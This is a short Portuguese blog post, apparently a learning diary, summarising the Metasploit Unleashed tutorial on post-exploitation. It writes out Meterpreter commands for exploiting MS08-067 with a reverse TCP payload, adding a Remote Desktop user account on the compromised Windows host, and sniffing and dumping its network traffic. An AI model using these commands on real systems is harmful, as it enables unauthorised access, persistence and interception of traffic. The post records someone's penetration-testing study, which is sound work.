DIA#26-Ethical Hacking Tools (Metasploit- O que fazer depois do exploit part2)
Continuo no tutorial da Offensive Security, na parte de o que fazer depois do exploit.
Activar o Remote Desktop
Para ter acesso ao Remote Desktop usa-se o script "getgui" no meterpreter que tanto dá acesso a Remote Desktop, como cria uma conta de utilizador para se poder fazer login, por exemplo, "run getgui -u user -p password". Seguidamente para entrar no utilizador windows a partir de linux usa-se "rdesktop", o que irá fechar a sessão aberta na consola. Quando se acabar de mexer no sistema deve-se limpar o utilizador criado com "run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc".
Packet Sniffing
Para fazer packet sniffing começa-se por usar "use exploit/windows/smb/ms08_067_netapi" com payload "set PAYLOAD windows/meterpeter/reverse_tcp" e um determinado LHost e RHost. A partir da sessão de Meterpreter criada usa-se "use sniffer", "sniffer_interfaces" para ver que interfaces existem, "sniffer_start 2" para seleccionar uma das interfaces observadas anteriormente e "sniffer_dump 2 /tmp/all.cap" para colocar os packets capturados em "/tmp/all.cap". Quando se quer parar usa-se "sniffer_stop 2" e "sniffer_release 2". Durante este processo o Meterpreter está a enviar a data através de um túnel de SSL/TLS, estando encriptada.
Outra alternativa é usar o comando "packetrecorder", para ver um exemplo do uso deste comando recomendo ir a "https://www.offensive-security.com/metasploit-unleashed/packet-sniffing/".
Comentários
Enviar um comentário